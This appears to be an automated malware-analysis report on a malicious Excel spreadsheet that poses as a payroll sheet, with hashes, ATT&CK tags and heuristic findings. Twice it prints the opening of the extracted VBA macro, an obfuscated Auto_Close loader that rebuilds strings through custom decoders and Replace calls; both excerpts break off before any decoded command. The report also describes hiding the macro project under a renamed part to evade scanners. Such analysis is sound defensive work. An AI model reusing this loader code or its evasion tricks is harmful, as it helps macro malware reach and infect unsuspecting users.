Office (OOXML) / .XLSX malware analysis — malicious · 72c4d87884a457ef

MALICIOUS

Office (OOXML) / .XLSX

58.3 KB Created: 2015-06-05 18:17:20 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2022-04-28

MD5: de84230efa9db61cde30653696886bbe SHA-1: 2a1f06d408b1b34e819dfb89b52a2520ae761ddf SHA-256: 72c4d87884a457efec45cdd22dc2027fd76be4544adb0b3ce2e3473f33d79e9b

240 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample is an Excel spreadsheet containing obfuscated VBA macros, specifically an Auto_Close macro designed to execute code. The presence of 'GetObject' and 'CreateObject' calls, along with the obfuscated loader, indicates an attempt to download and execute a second-stage payload. The document body, presenting a payroll sheet, serves as a lure for the user to open and interact with the malicious content.

Heuristics 6

VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: xl/aksodkoasakdoakain.ajshdu~!J~JK~!JK~!)
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED

The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas
1784778115c9e03a6ed72f37caa2a8405af7a35ed43729cad0f6ba9a2f11f280 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 64372 bytes

Filename	Kind	Source	Size
`macros.bas` `1784778115c9e03a6ed72f37caa2a8405af7a35ed43729cad0f6ba9a2f11f280`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	64372 bytes
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub Auto_Close() MsgBox NHXIsYp(V08gR65otwmQ("#PM/Yl+{+�J8`'r�ŽP8}D\|‚", "ccpA8TmUK"), V08gR65otwmQ(" ýú.ê+êì", "DoeTWoaAqj")) Plian = V08gR65otwmQ("IHJL{Ž€Oƒ…—S‡‰›WJ‹‰�¡]PQ�“”’d˜˜ž—ª£�lŸn°¶ rt¦»¥©ª¨z®®´À¹³¼ƒÊÊ†•—ª¼‹ž›ÔÔ¢ÀÔÂÇÉÛ—ËÍß›ÎÏžÑ âèßÖ¡§¦¨ªªÝ¬îô¾Ñã²ÅÂûû", "OJcheJ") Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ("äIÔ ", "yI6iVQlX"), V08gR65otwmQ("lCT4a", "biW7d8")), NHXIsYp(V08gR65otwmQ("©", "RUID5"), V08gR65otwmQ("âûØô", "GQTYdwf"))) Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ("-CA.", "cQNZTDfm"), V08gR65otwmQ("òèé÷ÿÝ à", "IvCDXw4U")), NHXIsYp(V08gR65otwmQ("á", "jaDeF"), V08gR65otwmQ("2/$5J^", "Hxebn7xfsj"))) Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ(" ýø\", "qlhJ3Pe09"), V08gR65otwmQ("ÖèöÇèØÈ", "ROwc")), NHXIsYp(V08gR65otwmQ("Î", "ReMm"), V08gR65otwmQ(" ø ", "xG8YP"))) Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ("�Ò°Õ", "hAvsqfZLk"), V08gR65otwmQ("�Qd„cj�‘", "zCjkWjYk")), NHXIsYp(V08gR65otwmQ("Ÿ", "dnkJpz"), V08gR65otwmQ("`MT/", "ybnh5"))) Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ("�÷œË÷�", "tisyt9"), V08gR65otwmQ(" ! ", "kzhPgbwd9G")), NHXIsYp(NHXIsYp(V08gR65otwmQ(V08gR65otwmQ(V08gR65otwmQ("Ã", "yUoOyb0VGM"), "tmgRx"), "eV6UPO"), V08gR65otwmQ("Ì¥™º¼³", "R6XnQdZ")), V08gR65otwmQ("6 P F", "Bp0HjSC3Y0"))) Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ(" A+i €2#", "wpTyM"), V08gR65otwmQ("Ææ¹ÉÊ²", "fEcf")), NHXIsYp(V08gR65otwmQ("4", "pPWJaU"), V08gR65otwmQ("; ú", "hlxsEZb"))) Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ("ÏÐâ Ô ÃØÃÛ", "ihilOMf"), V08gR65otwmQ("�°‹�", "aZogVN")), NHXIsYp(V08gR65otwmQ("á", "jaDeF"), V08gR65otwmQ("2/$5J^", "Hxebn7xfsj"))) Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ("R : H\~", "JIUgwfjg"), V08gR65otwmQ("…�ƒe", "GIczVBObV")), NHXIsYp(V08gR65otwmQ("á", "jaDeF"), V08gR65otwmQ(" Ø ñÜ", "qEbBW4oM"))) Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ("£å°š ¬êªŸÑ·ï", "xvPxOs10tA"), V08gR65otwmQ("V `M/", "mcQDPvPg")), NHXIsYp(V08gR65otwmQ("†", "Mqiu2B6"), V08gR65otwmQ("£zŽª™k", "MIZB"))) Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ("åµâÃ·", "zrXmT2BkGT"), V08gR65otwmQ("•›¶–‘Á", "BUz7JlD")), NHXIsYp(V08gR65otwmQ(V08gR65otwmQ("Ã", "yUoOyb0VGM"), "tmgRx"), V08gR65otwmQ("8=8_PQdR.", "mLk2VC"))) Bleacher = "$!kasD@JUDjw8ekkaksdA^^#!ASSD!`~ADU&2EkasD@JUDjw8U8e2msmmdm3ASNSDu2!kasD@JUDjw8&#koaksodkaoASSD!`~1koasdkkASNSDu2!kasD@JUDjw8&#ASSD!`~93koasdkk$!KD~$!KD~CASNSDu2!kasD@JUDjw8&#koasdkkJASU2dkkasD@JUDjw8DUsjasdmsmmdmASSD!`~koasdkkASSD!`~ASSD!`~AASSD!`~CjasdASSD!`~5msmmdmjiasjdijiasjdiJASU2dkkasD@JUDjw8DUs" Bleacher = Replace(Bleacher, NHXIsYp(V08gR65otwmQ("›¤PW¤tE8", "lF1E"), V08gR65otwmQ("Ü»þÙÒ ÞÚÃ", "PYrj")), NHXIsYp(V08gR65otwmQ("¼", "rlO7"), V08gR65otwmQ("ÑÐ±ºÈäºÛ", "vFAy8Tg"))) Bleacher = Replace(Bleacher, NHXIsYp(V08gR65otwmQ("xdjZeq¼¬fzmUijiYm�¬¿Ô", "GvmDx5pqE"), V08gR65otwmQ("]9Z/GB43", "y1hua")), NHXIsYp(V08gR65otwmQ(V08gR65otwmQ("š", "wIMp"), "ZrzNo"), V08gR65otwmQ("RuGF", "DqnPLtuS"))) Bleacher = Replace(Bleacher, NHXIsYp(V08gR65otwmQ("¡ÇŸ—Ú¹²É¥™", "sBDKI"), V08gR65otwmQ(" áùùÀ×", "dv0ejUW")), NHXIsYp(V08gR65otwmQ("ú", "CAT3MDRZCh"), V08gR65otwmQ("èö ì õ", "cmrc"))) Bleacher = Replace(Bleacher, NHXIsYp(V08gR65otwmQ(" ü", "yhqdz09zck"), V08gR65otwmQ("<LajGg.", "zfOFapGf")), NHXIsYp(V08gR65otwmQ("j", "RxXxqnoAys"), V08gR65otwmQ(" ò", "cRWWI"))) Bleacher = Replace(Bleacher, NHXIsYp(V08gR65otwmQ("�¹µÖ³’", "Oqmbea0"), V08gR65otwmQ("§”†u‰�", "vkgo9G")), NHXIsYp(V08gR65otwmQ("²", "wNS9ZZ8cDY"), V08gR65otwmQ("Yc„p‹”T", "q9HeyC"))) Bleacher = Replace(Bleacher, NHXIsYp(V08gR65otwmQ("¥–8dq/¦BIRdt²", "pbkMXdLa1"), V08gR65otwmQ(" ñ õ", "uXENU")), NHXIsYp(NHXIsYp(V08gR65otwmQ(V08gR65otwmQ(V08gR65otwmQ("Ã", "yUoOyb0VGM"), "tmgRx"), "eV6UPO"), V08gR65otwmQ("Ì¥™º¼³", "R6XnQdZ")), V08gR65otwmQ("on�œ–«", "PeA30ld"))) Bleacher = Replace(Bleacher, NHXIsYp(V08gR65otwmQ("œ§Èõ®¨", "MLL6x"), V08gR65otwmQ("GV- EJ", "jbCkiBHj")), NHXIsYp(V08gR65otwmQ("&", "D0YP"), V08gR65otwmQ("µ‰ªµ", "uQdPwO1CKB"))) Bleacher = Replace(Bleacher, NHXIsYp(V08gR65otwmQ("ˆV 8,", "LjSo7k4oJ"), V08gR65otwmQ(" ô ", "m1cr4")), NHXIsYp(V08gR65otwmQ("Î", "ReMm"), V08gR65otwm ... (truncated)
`vbaProject_00.bin` `28ab76fb238a0f79c7cbbb7f8b4d1fe8645de1d44cf671da03d3988a70771f52`	vba-project	OOXML VBA project: xl/aksodkoasakdoakain.ajshdu~!J~JK~!JK~!	161792 bytes

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Module1"
Sub Auto_Close()
MsgBox NHXIsYp(V08gR65otwmQ("#PM/Yl+{+�J8`'r�*ŽP8}D|‚", "ccpA8TmUK"), V08gR65otwmQ(" ýú.ê+êì", "DoeTWoaAqj"))
Plian = V08gR65otwmQ("IHJL{Ž€Oƒ…—S‡‰›WJ‹‰�¡]PQ�“”’d˜˜ž—ª£�lŸn°¶ rt¦»¥©ª¨z®®´À¹³¼ƒÊÊ†•—ª¼‹ž›ÔÔ¢ÀÔÂÇÉÛ—ËÍß›ÎÏžÑ âèßÖ¡§¦¨ªªÝ¬îô¾Ñã²ÅÂûû", "OJcheJ")
Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ("äIÔ  ", "yI6iVQlX"), V08gR65otwmQ("lC*T4a", "biW7d8")), NHXIsYp(V08gR65otwmQ("©", "RUID5"), V08gR65otwmQ("âûØô", "GQTYdwf")))
Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ("-CA.", "cQNZTDfm"), V08gR65otwmQ("òèé÷ÿÝ à", "IvCDXw4U")), NHXIsYp(V08gR65otwmQ("á", "jaDeF"), V08gR65otwmQ("2/$5J^", "Hxebn7xfsj")))
Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ(" ýø\", "qlhJ3Pe09"), V08gR65otwmQ("ÖèöÇèØÈ", "ROwc")), NHXIsYp(V08gR65otwmQ("Î", "ReMm"), V08gR65otwmQ(" ø    ", "xG8YP")))
Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ("�Ò°Õ", "hAvsqfZLk"), V08gR65otwmQ("�Qd„cj�‘", "zCjkWjYk")), NHXIsYp(V08gR65otwmQ("Ÿ", "dnkJpz"), V08gR65otwmQ("`MT/", "ybnh5")))
Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ("�÷œË÷�", "tisyt9"), V08gR65otwmQ("  ! ", "kzhPgbwd9G")), NHXIsYp(NHXIsYp(V08gR65otwmQ(V08gR65otwmQ(V08gR65otwmQ("Ã", "yUoOyb0VGM"), "tmgRx"), "eV6UPO"), V08gR65otwmQ("Ì¥™º¼³", "R6XnQdZ")), V08gR65otwmQ("6 P F", "Bp0HjSC3Y0")))
Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ(" A+i €2#", "wpTyM"), V08gR65otwmQ("Ææ¹ÉÊ²", "fEcf")), NHXIsYp(V08gR65otwmQ("4", "pPWJaU"), V08gR65otwmQ(";     ú", "hlxsEZb")))
Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ("ÏÐâ Ô  ÃØÃÛ", "ihilOMf"), V08gR65otwmQ("�°‹�", "aZogVN")), NHXIsYp(V08gR65otwmQ("á", "jaDeF"), V08gR65otwmQ("2/$5J^", "Hxebn7xfsj")))
Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ("R  : H\~", "JIUgwfjg"), V08gR65otwmQ("…�ƒe", "GIczVBObV")), NHXIsYp(V08gR65otwmQ("á", "jaDeF"), V08gR65otwmQ("  Ø  ñÜ", "qEbBW4oM")))
Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ("£å°š ¬êªŸÑ·ï", "xvPxOs10tA"), V08gR65otwmQ("V `M/", "mcQDPvPg")), NHXIsYp(V08gR65otwmQ("†", "Mqiu2B6"), V08gR65otwmQ("£zŽª™k", "MIZB")))
Plian = Replace(Plian, NHXIsYp(V08gR65otwmQ("åµâÃ·", "zrXmT2BkGT"), V08gR65otwmQ("•›¶–‘Á", "BUz7JlD")), NHXIsYp(V08gR65otwmQ(V08gR65otwmQ("Ã", "yUoOyb0VGM"), "tmgRx"), V08gR65otwmQ("8=8_PQdR.", "mLk2VC")))
Bleacher = "$!kasD@JUDjw8ekkaksdA^^#!ASSD!`~ADU&2EkasD@JUDjw8U8e2msmmdm3ASNSDu2!kasD@JUDjw8&#koaksodkaoASSD!`~1koasdkkASNSDu2!kasD@JUDjw8&#ASSD!`~93koasdkk$!KD~$!KD~CASNSDu2!kasD@JUDjw8&#koasdkkJASU2dkkasD@JUDjw8*DUsjasdmsmmdmASSD!`~koasdkkASSD!`~ASSD!`~AASSD!`~CjasdASSD!`~5msmmdmjiasjdijiasjdiJASU2dkkasD@JUDjw8*DUs"
Bleacher = Replace(Bleacher, NHXIsYp(V08gR65otwmQ("›¤PW¤tE8", "lF1E"), V08gR65otwmQ("Ü»þÙÒ ÞÚÃ", "PYrj")), NHXIsYp(V08gR65otwmQ("¼", "rlO7"), V08gR65otwmQ("ÑÐ±ºÈäºÛ", "vFAy8Tg")))
Bleacher = Replace(Bleacher, NHXIsYp(V08gR65otwmQ("xdjZeq¼¬fzmUijiYm�¬¿Ô", "GvmDx5pqE"), V08gR65otwmQ("]9Z/GB43", "y1hua")), NHXIsYp(V08gR65otwmQ(V08gR65otwmQ("š", "wIMp"), "ZrzNo"), V08gR65otwmQ("RuGF", "DqnPLtuS")))
Bleacher = Replace(Bleacher, NHXIsYp(V08gR65otwmQ("¡ÇŸ—Ú¹²É¥™", "sBDKI"), V08gR65otwmQ(" áùùÀ×", "dv0ejUW")), NHXIsYp(V08gR65otwmQ("ú", "CAT3MDRZCh"), V08gR65otwmQ("èö ì õ", "cmrc")))
Bleacher = Replace(Bleacher, NHXIsYp(V08gR65otwmQ("   ü", "yhqdz09zck"), V08gR65otwmQ("<LajGg.", "zfOFapGf")), NHXIsYp(V08gR65otwmQ("j", "RxXxqnoAys"), V08gR65otwmQ("   ò", "cRWWI")))
Bleacher = Replace(Bleacher, NHXIsYp(V08gR65otwmQ("�¹µÖ³’", "Oqmbea0"), V08gR65otwmQ("§”†u‰�", "vkgo9G")), NHXIsYp(V08gR65otwmQ("²", "wNS9ZZ8cDY"), V08gR65otwmQ("Yc„p‹”T", "q9HeyC")))
Bleacher = Replace(Bleacher, NHXIsYp(V08gR65otwmQ("¥–8dq/¦BIRdt²", "pbkMXdLa1"), V08gR65otwmQ("    ñ õ", "uXENU")), NHXIsYp(NHXIsYp(V08gR65otwmQ(V08gR65otwmQ(V08gR65otwmQ("Ã", "yUoOyb0VGM"), "tmgRx"), "eV6UPO"), V08gR65otwmQ("Ì¥™º¼³", "R6XnQdZ")), V08gR65otwmQ("on�œ–«", "PeA30ld")))
Bleacher = Replace(Bleacher, NHXIsYp(V08gR65otwmQ("œ§Èõ®¨", "MLL6x"), V08gR65otwmQ("GV- EJ", "jbCkiBHj")), NHXIsYp(V08gR65otwmQ("&", "D0YP"), V08gR65otwmQ("µ‰ªµ", "uQdPwO1CKB")))
Bleacher = Replace(Bleacher, NHXIsYp(V08gR65otwmQ("ˆV 8,", "LjSo7k4oJ"), V08gR65otwmQ("  ô  ", "m1cr4")), NHXIsYp(V08gR65otwmQ("Î", "ReMm"), V08gR65otwm
... (truncated)

vbaProject_00.bin
28ab76fb238a0f79c7cbbb7f8b4d1fe8645de1d44cf671da03d3988a70771f52 vba-project OOXML VBA project: xl/aksodkoasakdoakain.ajshdu~!J~JK~!JK~! 161792 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.